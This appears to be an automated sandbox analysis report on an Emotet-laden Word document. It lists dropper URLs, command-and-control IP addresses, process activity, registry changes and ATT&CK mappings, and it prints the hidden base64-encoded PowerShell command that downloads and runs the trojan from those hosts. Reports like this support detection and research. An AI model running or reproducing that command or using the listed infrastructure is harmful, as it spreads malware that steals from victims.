emotet | 23419c0a7cc778b60899d25977c95f7291915539f5f9bb85c5ce3bfe11c77e9b

General

Target

Docs_b147ef181809997d173ebc4242d4a74d.28.doc
Sample

191209-634tpcdtna
SHA256

23419c0a7cc778b60899d25977c95f7291915539f5f9bb85c5ce3bfe11c77e9b

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://www.aitb66.com/wp-admin/wdm12182/

exe.dropper

http://zisoft.zinad.net/wp-content/7flgzi080/

exe.dropper

http://ausflugemarrakesh.com/cgi-bin/512/

exe.dropper

http://axis-gps.com/pzdjz/hgpu56/

exe.dropper

https://xploremotions.com/rtrx/c656/

Extracted

Family

emotet

C2

76.221.133.146:80

104.33.129.244:80

172.90.70.168:8080

96.126.121.64:443

104.236.137.72:8080

172.104.233.225:8080

85.234.143.94:8080

50.28.51.143:8080

190.186.164.23:80

47.146.42.234:80

63.246.252.234:80

80.29.54.20:80

68.183.190.199:8080

46.28.111.142:7080

183.82.97.25:80

87.106.46.107:8080

188.216.24.204:80

186.68.48.204:443

181.198.203.45:443

88.250.223.190:8080

rsa_pubkey.plain

Signatures

Executes dropped EXE 4 IoCs

Processes:

377.exe377.exesitkascan.exesitkascan.exe

pid process

1112 377.exe
316 377.exe
1148 sitkascan.exe
528 sitkascan.exe

pid	process
1112	377.exe
316	377.exe
1148	sitkascan.exe
528	sitkascan.exe

Drops file in System32 directory 6 IoCs

Processes:

Powershell.exe377.exesitkascan.exeWINWORD.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	Powershell.exe
File renamed	C:\Users\Admin\377.exe => C:\Windows\SysWOW64\sitkascan.exe	377.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	sitkascan.exe
File deleted	C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD	WINWORD.EXE
File created	C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD	WINWORD.EXE
File opened for modification	C:\Windows\system32\GDIPFONTCACHEV1.DAT	WINWORD.EXE

Modifies registry class 136 IoCs

Processes:

description	ioc
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{95F3BE65-CED6-4EEB-9775-7CFDBFC48831}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{95F3BE65-CED6-4EEB-9775-7CFDBFC48831}\2.0\FLAGS\ = "6"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{95F3BE65-CED6-4EEB-9775-7CFDBFC48831}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{95F3BE65-CED6-4EEB-9775-7CFDBFC48831}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{95F3BE65-CED6-4EEB-9775-7CFDBFC48831}\2.0\ = "Microsoft Forms 2.0 Object Library"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1992 WINWORD.EXE
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

WINWORD.EXE

pid process

1992 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

Powershell.exesitkascan.exe

pid process

2040 Powershell.exe
528 sitkascan.exe
Suspicious behavior: EmotetMutantsSpam 2 IoCs

Processes:

377.exesitkascan.exe

pid process

316 377.exe
528 sitkascan.exe
Emotet
Emotet is a trojan that is primarily spread through spam emails
trojan banker emotet
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

WINWORD.EXEconhost.exe377.exe377.exesitkascan.exesitkascan.exe

pid process

1992 WINWORD.EXE
2008 conhost.exe
1112 377.exe
316 377.exe
1148 sitkascan.exe
528 sitkascan.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Powershell.exe

description pid process

Token: SeDebugPrivilege 2040 Powershell.exe

pid	process
1992	WINWORD.EXE

pid	process
1992	WINWORD.EXE

pid	process
2040	Powershell.exe
528	sitkascan.exe

pid	process
316	377.exe
528	sitkascan.exe

pid	process
1992	WINWORD.EXE
2008	conhost.exe
1112	377.exe
316	377.exe
1148	sitkascan.exe
528	sitkascan.exe

description	pid	process
Token: SeDebugPrivilege	2040	Powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

Powershell.exe377.exesitkascan.exe

description	pid	process	target process
PID 2040 wrote to memory of 1112	2040	Powershell.exe	377.exe
PID 1112 wrote to memory of 316	1112	377.exe	377.exe
PID 1148 wrote to memory of 528	1148	sitkascan.exe	sitkascan.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_b147ef181809997d173ebc4242d4a74d.28.doc"
1⤵
- Drops file in System32 directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1992

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABSAGIAcgBtAHcAbABxAHkAaAByAD0AJwBSAHEAZAB6AHEAcgBtAHQAcwB4ACcAOwAkAE8AZABrAHUAZwBtAHIAagBnAGIAIAA9ACAAJwAzADcANwAnADsAJABOAHgAbABrAGMAZQBiAGYAYgBhAHoAPQAnAEQAbAByAGgAYwB3AHQAYQBjAHAAJwA7ACQARAB1AGsAcgBhAHkAeQBhAHgAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATwBkAGsAdQBnAG0AcgBqAGcAYgArACcALgBlAHgAZQAnADsAJABUAHAAcAB2AHEAdQByAHAAegBqAG8AZQA9ACcATgBpAGYAcABwAGQAcgBlAG8AJwA7ACQAUQBwAHkAeQBsAHEAaAB6AHoAdgBrAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAFcARQBCAGMAbABpAGUATgB0ADsAJABPAHoAdQBkAG4AZQBjAGkAZQB5AG8APQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBhAGkAdABiADYANgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdwBkAG0AMQAyADEAOAAyAC8AKgBoAHQAdABwADoALwAvAHoAaQBzAG8AZgB0AC4AegBpAG4AYQBkAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANwBmAGwAZwB6AGkAMAA4ADAALwAqAGgAdAB0AHAAOgAvAC8AYQB1AHMAZgBsAHUAZwBlAG0AYQByAHIAYQBrAGUAcwBoAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ANQAxADIALwAqAGgAdAB0AHAAOgAvAC8AYQB4AGkAcwAtAGcAcABzAC4AYwBvAG0ALwBwAHoAZABqAHoALwBoAGcAcAB1ADUANgAvACoAaAB0AHQAcABzADoALwAvAHgAcABsAG8AcgBlAG0AbwB0AGkAbwBuAHMALgBjAG8AbQAvAHIAdAByAHgALwBjADYANQA2AC8AJwAuACIAUwBgAHAATABpAHQAIgAoACcAKgAnACkAOwAkAEsAdQBuAGkAbgBrAGgAYwA9ACcAUABtAGsAbABmAGgAcwBtAHQAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgB5AGgAeQBlAHgAaABkAHgAYgAgAGkAbgAgACQATwB6AHUAZABuAGUAYwBpAGUAeQBvACkAewB0AHIAeQB7ACQAUQBwAHkAeQBsAHEAaAB6AHoAdgBrAC4AIgBkAE8AdwBuAEwAYABPAGAAQQBkAEYAaQBMAGUAIgAoACQAQgB5AGgAeQBlAHgAaABkAHgAYgAsACAAJABEAHUAawByAGEAeQB5AGEAeABoACkAOwAkAFgAagBsAHYAbQBhAGYAYQBwAGIAcABzAD0AJwBFAGcAbQB6AGgAYwB3AHcAeAB2AHUAZQBqACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQARAB1AGsAcgBhAHkAeQBhAHgAaAApAC4AIgBsAGUATgBgAGcAdABoACIAIAAtAGcAZQAgADMANgA5ADEAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAFIAVAAiACgAJABEAHUAawByAGEAeQB5AGEAeABoACkAOwAkAFUAZABwAHIAeABkAHgAcwB4AGgAdwBzAD0AJwBYAHIAZgBnAGQAbABhAHUAcABrAHgAJwA7AGIAcgBlAGEAawA7ACQAUABhAGkAcQBqAGEAeABnAGwAYwA9ACcAQQBqAHUAYgBhAGYAZABjACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQAegBkAHMAbwByAHoAbwBmAHQAdwBzAGkAPQAnAFEAbgByAHcAaABsAG8AcQBkAGMAYgAnAA==
1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040

C:\Users\Admin\377.exe
"C:\Users\Admin\377.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1112

C:\Users\Admin\377.exe
--11945cd1
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
PID:316

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1003057684324364423430350252008227691971696020-12325563152092719173-1366370866"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2008

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:2028

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
1⤵
PID:1912

C:\Windows\SysWOW64\sitkascan.exe
"C:\Windows\SysWOW64\sitkascan.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1148

C:\Windows\SysWOW64\sitkascan.exe
--30bfeaa7
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
PID:528

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\377.exe

Download Submit
C:\Users\Admin\377.exe

Download Submit
C:\Users\Admin\377.exe

Download Submit
C:\Windows\SysWOW64\sitkascan.exe

Download Submit
C:\Windows\SysWOW64\sitkascan.exe

Download Submit
memory/316-12-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/316-11-0x00000000002F0000-0x0000000000307000-memory.dmp

Filesize
92KB

Download
memory/528-17-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1112-9-0x0000000000380000-0x0000000000397000-memory.dmp

Filesize
92KB

Download
memory/1148-14-0x0000000000640000-0x0000000000657000-memory.dmp

Filesize
92KB

Download
memory/1992-6-0x000000000651F000-0x0000000006523000-memory.dmp

Filesize
16KB

Download
memory/1992-5-0x000000000651F000-0x0000000006523000-memory.dmp

Filesize
16KB

Download
memory/1992-4-0x00000000064F9000-0x000000000651F000-memory.dmp

Filesize
152KB

Download
memory/1992-3-0x0000000008ED0000-0x0000000008ED4000-memory.dmp

Filesize
16KB

Download
memory/1992-0-0x0000000006400000-0x0000000006404000-memory.dmp

Filesize
16KB

Download
memory/1992-2-0x000000000651F000-0x0000000006523000-memory.dmp

Filesize
16KB

Download
memory/1992-1-0x00000000065A0000-0x00000000065A3000-memory.dmp

Filesize
12KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads